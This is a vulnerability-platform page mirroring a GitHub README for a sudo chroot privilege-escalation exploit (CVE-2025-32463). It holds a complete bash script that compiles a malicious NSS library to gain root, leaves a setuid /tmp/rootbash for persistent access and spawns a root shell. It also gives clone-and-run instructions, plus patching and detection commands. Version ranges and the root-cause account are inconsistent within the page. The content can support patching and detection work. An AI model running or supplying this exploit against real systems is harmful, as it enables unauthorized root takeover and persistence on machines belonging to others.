漏洞平台

POC详情： 60374be6134c94ca4e599967f27ef3fb4a900684

来源

https://github.com/KaiHT-Ladiant/CVE-2025-32463

关联漏洞

标题： Sudo 安全漏洞 (CVE-2025-32463)
描述：Sudo是一款使用于类Unix系统的，允许用户通过安全的方式使用特殊的权限执行命令的程序。 Sudo 1.9.17p1之前版本存在安全漏洞，该漏洞源于使用用户控制目录中的/etc/nsswitch.conf可能导致获取root访问权限。

描述

CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit

介绍

# CVE-2025-32463 - Sudo Chroot Privilege Escalation Exploit

## Overview

CVE-2025-32463 is a critical local privilege escalation vulnerability in sudo versions 1.9.14 through 1.9.17. This vulnerability allows attackers with sudo privileges to escalate to root access by exploiting a design flaw in the chroot option processing logic.

## Vulnerability Details

- **CVE ID**: CVE-2025-32463
- **Affected Versions**: sudo 1.9.14 - 1.9.17
- **Vulnerability Type**: Local Privilege Escalation (LPE)
- **Severity**: Critical
- **Patched Version**: sudo 1.9.17p1 and later

## Technical Description

The vulnerability occurs due to a **timing issue in sudo's security validation process**. The `pivot_root` function is executed **before security policy verification**, allowing attackers to manipulate the file system environment that sudo uses for authentication and authorization.

### Attack Flow

1. **Environment Manipulation**: Attacker creates a controlled chroot environment with malicious `nsswitch.conf`
2. **Library Injection**: Malicious NSS (Name Service Switch) library is placed in the controlled environment
3. **Privilege Escalation**: sudo loads and executes the malicious library with root privileges
4. **Root Access**: Attacker gains full root shell access

### Affected Functions

- `pivot_root`: Executed too early in the process
- `set_cmnd_path`: Operates in the manipulated environment
- `command_matches`: Security checks bypassed due to environment manipulation

## Prerequisites

Before using this exploit, ensure the following conditions are met:

- [ ] Target system runs sudo version 1.9.14 - 1.9.17
- [ ] Current user has sudo privileges
- [ ] sudoers configuration allows chroot operations
- [ ] gcc compiler is available on the target system
- [ ] Write access to temporary directories (e.g., /tmp)

## Usage

### Quick Start

1. Clone this repository:
```
git clone https://github.com/KaiHT-Ladiant/CVE-2025-32463
cd CVE-2025-32463
```

2. Make the script executable:
```
chmod +x cve-2025-32463.sh
```

3. Run the exploit:
```
./cve-2025-32463.sh
```

### Manual Verification

Check if the target system is vulnerable:

```
# Check sudo version
sudo --version

# Check sudo privileges
sudo -l

# Look for chroot-related permissions
sudo -l | grep chroot
```

## Exploit Code

The main exploit script (`cve-2025-32463.sh`):

```
#!/bin/bash
# CVE-2025-32463 PoC - Sudo Chroot Privilege Escalation
# Based on research by Rich Mirch @ Stratascale Cyber Research Unit

STAGE=$(mktemp -d /tmp/pentest.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > pentester.c<<'CEOF'
#include <stdlib.h>
#include <unistd.h>

void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  system("id > /tmp/pwned_proof.txt");
  system("cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash");
  execl("/bin/bash", "/bin/bash", NULL);
}
CEOF

mkdir -p pentest/etc libnss_
echo "passwd: /pentester" > pentest/etc/nsswitch.conf
cp /etc/group pentest/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/pentester.so.2 pentester.c

echo "[*] Exploiting CVE-2025-32463..."
echo "[*] Attempting privilege escalation..."
sudo -R pentest pentest

# Cleanup
rm -rf ${STAGE?}
```

## Verification

After successful exploitation, verify root access:

```
# Check current privileges
whoami

# Check proof file
cat /tmp/pwned_proof.txt

# Use setuid bash for persistent root access
/tmp/rootbash -p
```

## Mitigation

### Immediate Actions

1. **Update sudo** to version 1.9.17p1 or later:
   ```
   # Ubuntu/Debian
   sudo apt update && sudo apt upgrade sudo
   
   # CentOS/RHEL
   sudo yum update sudo
   
   # or
   sudo dnf update sudo
   ```

2. **Remove chroot directives** from sudoers (temporary workaround):
   ```
   # Backup current configuration
   sudo cp /etc/sudoers /etc/sudoers.backup
   
   # Remove chroot-related entries
   sudo sed -i '/chroot/d' /etc/sudoers
   
   # Verify syntax
   sudo visudo -c
   ```

### Detection

Monitor for exploitation attempts:

```
# Check for suspicious temporary directories
find /tmp -name "*.stage.*" -type d

# Monitor sudo logs
tail -f /var/log/auth.log | grep sudo

# Look for NSS library compilation
find /tmp -name "libnss_*.so*" -type f
```

## Technical Details

### Root Cause Analysis

The vulnerability stems from a **design flaw in sudo's execution flow**:

1. **Normal Expected Flow**:
   - Parse user input
   - Validate sudoers policy
   - Set up environment (including chroot)
   - Execute command

2. **Actual Vulnerable Flow**:
   - Parse user input
   - **Execute chroot (pivot_root) - Problem occurs here**
   - Validate sudoers policy (in manipulated environment)
   - Execute command

### NSS Library Exploitation

The exploit leverages the Name Service Switch (NSS) system:

1. Sudo reads `/etc/nsswitch.conf` for user authentication
2. In the chroot environment, attacker controls this file
3. Malicious NSS library is loaded with root privileges
4. Library constructor executes arbitrary code as root

## Testing Environment

This exploit has been tested on:

- Ubuntu 20.04/22.04 with sudo 1.9.15
- Debian 11/12 with sudo 1.9.14-1.9.17
- CentOS 8/9 with affected sudo versions
- Docker containers with vulnerable sudo installations

## References

- [Official sudo security advisory](https://www.sudo.ws/security/advisories/)
- [Original research by Rich Mirch](https://github.com/kh4sh3i/CVE-2025-32463)
- [Sudo source code analysis](https://github.com/sudo-project/sudo)

## Disclaimer

⚠️ **IMPORTANT DISCLAIMER** ⚠️

This tool is provided for **educational and authorized testing purposes only**. 

- Use only on systems you own or have explicit permission to test
- Unauthorized use of this exploit is illegal and unethical
- The authors are not responsible for any misuse or damage
- Always ensure you have proper authorization before conducting security testing

## Contributing

Contributions are welcome! Please:

1. Fork the repository
2. Create a feature branch
3. Submit a pull request with detailed description

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.

## Changelog

### v1.0.0
- Initial release
- Basic exploit functionality
- Comprehensive documentation

---

**Note**: This vulnerability affects a critical system component. Please use responsibly and ensure all testing is authorized.

文件快照


 [4.0K]  /data/pocs/60374be6134c94ca4e599967f27ef3fb4a900684
├── [ 800]  cve-2025-32463.sh
├── [6.9K]  LICENSE
└── [6.2K]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。